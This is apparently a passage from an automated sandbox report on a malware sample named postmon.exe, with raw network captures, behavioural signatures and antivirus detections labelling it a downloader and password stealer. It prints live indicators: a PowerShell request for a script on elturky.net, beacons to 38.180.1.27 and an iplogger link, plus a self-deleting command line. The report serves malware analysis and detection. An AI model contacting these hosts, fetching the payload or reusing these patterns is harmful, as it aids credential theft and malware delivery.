0x87, 0x16, 0x76, 0x90, 0x0b, 0xaa, 0xfe, 0xcb, 0x0a, 0x95, 0xd4, 0xd0, 0x18, 0x0e, 0xd5, 0x1f, 0x0a, 0xca, 0xed, 0x0b, 0x48, 0x9e, 0x6e, 0xc4, 0xb3, 0x85, 0x60, 0x9e, 0x3d, 0x15, 0xc6, 0xfc, 0x91, 0x9f, 0x9c, 0x50, 0x8d, 0x50, 0xbb, 0xd0, 0x7b, 0x96, 0xec, 0x1c, 0x17, 0x91, 0xbf, 0x99, 0x8c, 0x27, 0x46, 0x39, 0xd7, 0x65, 0x8d, 0xf8, 0x31, 0x1d, 0x70, 0x91, 0xed, 0xf5, 0x8b, 0xc7, 0xd7, 0xa8, 0xab, 0x9e, 0xe3, 0x8a, 0x0c, 0x06, 0x77, 0xde, 0x9e, 0x42, 0x78, 0x17, 0x92, 0x97, 0xf3, 0xf3, 0xaf, 0x65, 0x46, 0xc3, 0x9a, 0x59, 0xf2, 0x18, 0x2c, 0xbd, 0x12, 0
Data received	x4b, 0x5b, 0x5f, 0x77, 0x5e, 0x09, 0x5b, 0x6e, 0x59, 0x7d, 0x40, 0x50, 0x49, 0x36, 0x25, 0x6d, 0x2c, 0x9c, 0x5b, 0x75, 0x46, 0x4f, 0x37, 0x7a, 0x48, 0x63, 0x4c, 0x6d, 0x2c, 0x52, 0x53, 0x56, 0x5c, 0x29, 0x56, 0xe4, 0x6e, 0x48, 0x59, 0x77, 0x44, 0x36, 0x58, 0x73, 0x48, 0x67, 0x60, 0x6c, 0x57, 0x79, 0x55, 0x70, 0x4a, 0x33, 0x1c, 0x5a, 0x6d, 0x48, 0x5f, 0x77, 0x3d, 0x5d, 0x4c, 0x73, 0x4c, 0x61, 0x33, 0x7f, 0x57, 0x79, 0x57, 0x40, 0x4e, 0x5c, 0x15, 0x6b, 0x6d, 0x4e, 0x4a, 0x72, 0x44, 0x36, 0x5d, 0x73, 0x48, 0x67, 0x59, 0x6c, 0x38, 0x54, 0x53, 0x56, 0x5e, 0x22, 0x31, 0x7c, 0x07, 0x10, 0x4a, 0x70, 0x7e, 0xcd, 0x4e, 0x73, 0x48, 0x72, 0x4d, 0x06, 0x55, 0x02, 0x49, 0x56, 0x58, 0x37, 0x6b, 0x78, 0x65, 0x4a, 0x22, 0x7c, 0x46, 0x4d, 0x48, 0x75, 0x33, 0x48, 0x48, 0x6b, 0x53, 0x63, 0x31, 0x47, 0x50, 0x6b, 0xbb, 0x68, 0x6d, 0x48, 0x5b, 0x77, 0x3d, 0x59, 0x4c, 0x73, 0x4c, 0x4b, 0x4f, 0x6b, 0x57, 0x7f, 0x7e, 0x23, 0x5a, 0x48, 0x25, 0x6b, 0x6d, 0x4c, 0x4f, 0x1a, 0x68, 0x4d, 0x4c, 0x75, 0x5b, 0x69, 0x5a, 0x6b, 0x7f, 0x4c, 0x53, 0x56, 0x5e, 0x1e, 0x12, 0x69, 0x16, 0x58, 0x59, 0x75, 0x42, 0x4f, 0x37, 0x67, 0x48, 0x63, 0x4c, 0x7a, 0x52, 0x14, 0x42, 0x5c, 0x5a, 0x48, 0x25, 0x6b, 0x6d, 0x4c, 0x5e, 0x1a, 0x68, 0x4d, 0x4c, 0x75, 0x27, 0x41, 0x48, 0x6b, 0x51, 0x6a, 0x5a, 0x7d, 0x40, 0x31, 0x4f, 0x7b, 0x6d, 0x48, 0x5d, 0x77, 0x3d, 0x59, 0x4c, 0x73, 0x4c, 0x72, 0x4d, 0x06, 0x46, 0x73, 0x3c, 0x77, 0x58, 0x33, 0x32, 0x78, 0x64, 0x4a, 0x22, 0x64, 0x46, 0x4d, 0x48, 0x62, 0x41, 0x0c, 0x65, 0x6b, 0x57, 0x7f, 0x41, 0x56, 0x70, 0x02, 0x34, 0x6b, 0x6b, 0x59, 0x5c, 0x62, 0x2c, 0x15, 0x5f, 0x76, 0x70, 0xbf, 0x49, 0x6b, 0x57, 0x7b, 0x28, 0x5d, 0x58, 0x33, 0x30, 0x6d, 0x16, 0x63, 0x59, 0x75, 0x42, 0xc2, 0x4f, 0x73, 0x48, 0x61, 0x4a, 0x10, 0x43, 0x79, 0x53, 0x52, 0x70, 0x34, 0x34, 0x6b, 0x6b, 0x5f, 0x19, 0x97, 0x46, 0x4d, 0x4c, 0x71, 0x33, 0x6f, 0x48, 0x6b, 0x53, 0x7f, 0x28, 0x7d, 0x58, 0x33, 0x30, 0xe4, 0x6e, 0x48, 0x59, 0x77, 0x44, 0x36, 0x58, 0x73, 0x48, 0x67, 0x60, 0x6c, 0x57, 0x79, 0x55, 0x7b, 0x15, 0x31, 0x4f, 0x61, 0x6d, 0x48, 0x5d, 0x73, 0x3d, 0x66, 0x4c, 0x73, 0x4c, 0x79, 0x2a, 0x7a, 0x5f, 0x21, 0xdc, 0x55, 0x58, 0x33, 0x36, 0x69, 0x16, 0x5c, 0x59, 0x75, 0x42, 0x65, 0x4b, 0x73, 0x48, 0x65, 0x65, 0x15, 0x45, 0x79, 0x7b, 0x62, 0x58, 0x33, 0x32, 0x69, 0x16, 0x59, 0x59, 0x75, 0x42, 0x4f, 0x37, 0x62, 0x48, 0x63, 0x4c, 0x6c, 0x38, 0x57, 0x53, 0x56, 0x5e, 0x5c, 0x19, 0x6b, 0x6d, 0x4e, 0x48, 0x70, 0x51, 0x27, 0x14, 0x60, 0x4d, 0x5b, 0x07, 0x6a, 0x57, 0x79, 0x51, 0x2d, 0x55, 0x33, 0x34, 0x6f, 0x6b, 0x33, 0x72, 0x75, 0x46, 0x49, 0xc3, 0x70, 0x48, 0x63, 0x4a, 0x69, 0x2c, 0x6d, 0x53, 0x56, 0x5c, 0x1b, 0x33, 0x6b, 0x6d, 0x4e, 0x74, 0x70, 0x4e, 0x5e, 0x40, 0x58, 0x64, 0x61, 0x33, 0x65, 0x57, 0x79, 0x57, 0x50, 0x23, 0x18, 0x34, 0x6b, 0x69, 0xc7, 0x5a, 0x75, 0x46, 0x4f, 0x4e, 0x08, 0x5c, 0x63, 0x48, 0x6f, 0x7f, 0x7e, 0x53, 0x56, 0x5e, 0x1e, 0x31, 0x62, 0x7
Data received	x39, 0x25, 0x16, 0x3b, 0x63, 0x1b, 0x0e, 0x23, 0x29, 0x3c, 0x25, 0x1a, 0x5a, 0x40, 0x18, 0x3d, 0x3a, 0x36, 0x05, 0x23, 0x3f, 0x38, 0x1a, 0x2d, 0x10, 0x48, 0x38, 0x32, 0x0d, 0x17, 0x33, 0x3b, 0x5c, 0x50, 0x0e, 0x1f, 0x18, 0x2b, 0x1a, 0x36, 0x28, 0x3e, 0x07, 0x21, 0x06, 0x3b, 0x6b, 0x10, 0x1c, 0x27, 0x1a, 0x3d, 0x5d, 0x60, 0x04, 0x3d, 0x27, 0x2a, 0x26, 0x32, 0x2c, 0x38, 0x16, 0x48, 0x2f, 0x2d, 0x05, 0x13, 0x1c, 0x30, 0x39, 0x3c, 0x56, 0x46, 0x6b, 0x00, 0x17, 0x15, 0x1a, 0x31, 0x0e, 0x23, 0x17, 0x2d, 0x11, 0x48, 0x06, 0x08, 0x34, 0x3a, 0x32, 0x1b, 0x5c, 0x50, 0x0e, 0x1f, 0x48, 0x34, 0x2a, 0x05, 0x25, 0x23, 0x1a, 0x2b, 0x06, 0x48, 0x06, 0x08, 0x3a, 0x3b, 0x39, 0x31, 0x50, 0x51, 0x59, 0x6d, 0x25, 0x06, 0x3d, 0x2f, 0x2a, 0x24, 0x30, 0x27, 0x07, 0x2d, 0x19, 0x57, 0x14, 0x0c, 0x18, 0x2d, 0x5e, 0x64, 0x04, 0x1e, 0x1b, 0x2d, 0x14, 0x32, 0x28, 0x3f, 0x73, 0x0b, 0x11, 0x2d, 0x0a, 0x23, 0x1c, 0x53, 0x1a, 0x31, 0x47, 0x51, 0x19, 0x0c, 0x24, 0x1d, 0x10, 0x25, 0x22, 0x28, 0x16, 0x3a, 0x63, 0x25, 0x34, 0x14, 0x16, 0x37, 0x33, 0x2a, 0x40, 0x34, 0x06, 0x32, 0x06, 0x2c, 0x18, 0x16, 0x22, 0x3f, 0x31, 0x21, 0x17, 0x3b, 0x6b, 0x3a, 0x26, 0x1d, 0x23, 0x35, 0x63, 0x46, 0x0e, 0x1b, 0x0a, 0x30, 0x01, 0x35, 0x4d, 0x21, 0x2c, 0x18, 0x0c, 0x3b, 0x26, 0x36, 0x0a, 0x38, 0x56, 0x1f, 0x56, 0x40, 0x38, 0x19, 0x29, 0x2d, 0x10, 0x46, 0x09, 0x29, 0x10, 0x27, 0x07, 0x2d, 0x25, 0x38, 0x0b, 0x3e, 0x37, 0x34, 0x33, 0x70, 0x0e, 0x0e, 0x27, 0x3d, 0x10, 0x11, 0x24, 0x38, 0x1b, 0x05, 0x02, 0x3c, 0x08, 0x3f, 0x3b, 0x2a, 0x22, 0x3d, 0x33, 0x70, 0x0e, 0x0e, 0x27, 0x3d, 0x10, 0x34, 0x7f, 0x4c, 0x1e, 0x17, 0x27, 0x2d, 0x08, 0x38, 0x1d, 0x36, 0x24, 0x2b, 0x33, 0x7b, 0x1e, 0x19, 0x1f, 0x30, 0x1b, 0x22, 0x22, 0x3b, 0x73, 0x17, 0x01, 0x3d, 0x0d, 0x31, 0x1c, 0x21, 0x56, 0x07, 0x43, 0x5b, 0x18, 0x6d, 0x17, 0x2a, 0x01, 0x34, 0x28, 0x2d, 0x1e, 0x48, 0x3c, 0x3b, 0x1f, 0x25, 0x1c, 0x32, 0x3b, 0x08, 0x5c, 0x47, 0x6b, 0x32, 0x3f, 0x30, 0x1b, 0x22, 0x22, 0x3b, 0x20, 0x21, 0x19, 0x2d, 0x6b, 0x11, 0x15, 0x26, 0x25, 0x30, 0x33, 0x77, 0x04, 0x1d, 0x31, 0x1b, 0x19, 0x29, 0x2e, 0x27, 0x73, 0x18, 0x16, 0x3c, 0x29, 0x2e, 0x0d, 0x36, 0x56, 0x1f, 0x56, 0x40, 0x29, 0x14, 0x3c, 0x3c, 0x75, 0x15, 0x39, 0x2d, 0x07, 0x2d, 0x63, 0x01, 0x05, 0x33, 0x1c, 0x2b, 0x56, 0x0d, 0x43, 0x50, 0x0a, 0x19, 0x2d, 0x1a, 0x1d, 0x27, 0x3f, 0x4c, 0x26, 0x38, 0x07, 0x29, 0x1f, 0x32, 0x34, 0x32, 0x22, 0x3b, 0x5b, 0x34, 0x3e, 0x1d, 0x2c, 0x38, 0x01, 0x23, 0x1f, 0x29, 0x03, 0x48, 0x36, 0x38, 0x0f, 0x36, 0x0d, 0x36, 0x05, 0x30, 0x5c, 0x46, 0x1f, 0x3f, 0x2d, 0x29, 0x75, 0x0f, 0x3e, 0x0f, 0x1b, 0x29, 0x11, 0x1b, 0x1f, 0x36, 0x0d, 0x36, 0x56, 0x1b, 0x5c, 0x5a, 0x0d, 0x18, 0x3b, 0x3c, 0x11, 0x04, 0x34, 0x0d, 0x07, 0x3c, 0x11, 0x21, 0x09, 0x22, 0x0d, 0x36, 0x56, 0x19, 0x47, 0x40, 0x19, 0x04, 0x2a, 0x2c, 0x01, 0x23, 0x4d, 0x0f, 0x06, 0x3a, 0x15, 0x2d, 0x59, 0x62, 0x4c, 0x62, 0x6f, 0x58, 0x47, 0x59, 0x6b, 0x19, 0
Data received	HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jul 2023 08:35:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive 56 mHYuFMLsHcHkWySVX34k\|HnTgSX1R\|http://38.180.1.27/index.php\|https://iplogger.com/12GBH4 0

Poweshell is sending data to a remote host (2 events)

Data sent	GET /ERP/public/js/debug2.ps1 HTTP/1.1 Host: elturky.net Connection: Keep-Alive
Data sent	GET /index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=HnTgSX1R HTTP/1.1 Host: 38.180.1.27 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 28, 2023, 5:15 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
cmdline	ping 127.0.0.1
cmdline	"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL

Communicates with host for which no DNS query was performed (1 event)

host

38.180.1.27

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send July 28, 2023, 5:15 p.m.	buffer: GET /ERP/public/js/debug2.ps1 HTTP/1.1 Host: elturky.net Connection: Keep-Alive socket: 1256 sent: 85	1	85	0
send July 28, 2023, 5:15 p.m.	buffer: GET /index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=HnTgSX1R HTTP/1.1 Host: 38.180.1.27 Connection: Keep-Alive socket: 896 sent: 125	1	125	0

File has been identified by 57 AntiVirus engines on VirusTotal as malicious (50 out of 57 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Convagent.4!c
Elastic	malicious (high confidence)
DrWeb	Trojan.DownLoader45.58708
MicroWorld-eScan	Trojan.GenericKD.67478048
FireEye	Generic.mg.8bdd901591eb9045
McAfee	GenericRXAK-VM!8BDD901591EB
Malwarebytes	Trojan.Downloader
Zillya	Trojan.Coins.Win32.8032
Sangfor	Trojan.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	TrojanPSW:Win32/Coins.feb1fed3
K7GW	Riskware ( 0040eff71 )
K7AntiVirus	Riskware ( 0040eff71 )
Arcabit	Trojan.Generic.D405A220
BitDefenderTheta	Gen:NN.ZexaF.36318.EC0@aOVrhZmi
Cyren	W32/ABRisk.EDDT-2860
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	Win32/TrojanDownloader.Agent.GYX
Cynet	Malicious (score: 100)
APEX	Malicious
Kaspersky	HEUR:Trojan-PSW.Win32.Coins.gen
BitDefender	Trojan.GenericKD.67478048
SUPERAntiSpyware	Trojan.Agent/Gen-SelfDel
Avast	Win32:CrypterX-gen [Trj]
Tencent	Malware.Win32.Gencirc.13d0710f
Emsisoft	Trojan.GenericKD.67478048 (B)
F-Secure	Adware.ADWARE/HPDefender.jqeti
VIPRE	Trojan.GenericKD.67478048
TrendMicro	Trojan.Win32.LGOOGLOADER.YXDFLZ
McAfee-GW-Edition	BehavesLike.Win32.Generic.gc
Trapmine	malicious.high.ml.score
Sophos	Mal/Generic-S
SentinelOne	Static AI - Suspicious PE
Avira	ADWARE/HPDefender.jqeti
Antiy-AVL	Trojan[PSW]/Win32.Coins
Gridinsoft	Ransom.Win32.Sabsik.cl
Microsoft	Trojan:Win32/Redline!ic
ZoneAlarm	HEUR:Trojan-PSW.Win32.Coins.gen
GData	Trojan.GenericKD.67478048
Google	Detected
AhnLab-V3	Trojan/Win.VM.R586385
Acronis	suspicious
VBA32	BScope.TrojanPSW.Coins
ALYac	Trojan.GenericKD.67478048
MAX	malware (ai score=100)
Cylance	unsafe
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	Trojan.Win32.LGOOGLOADER.YXDFLZ
Rising	Dropper.Convagent!8.123ED (TFE:5:Bq2aQZTefJR)

postmon.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All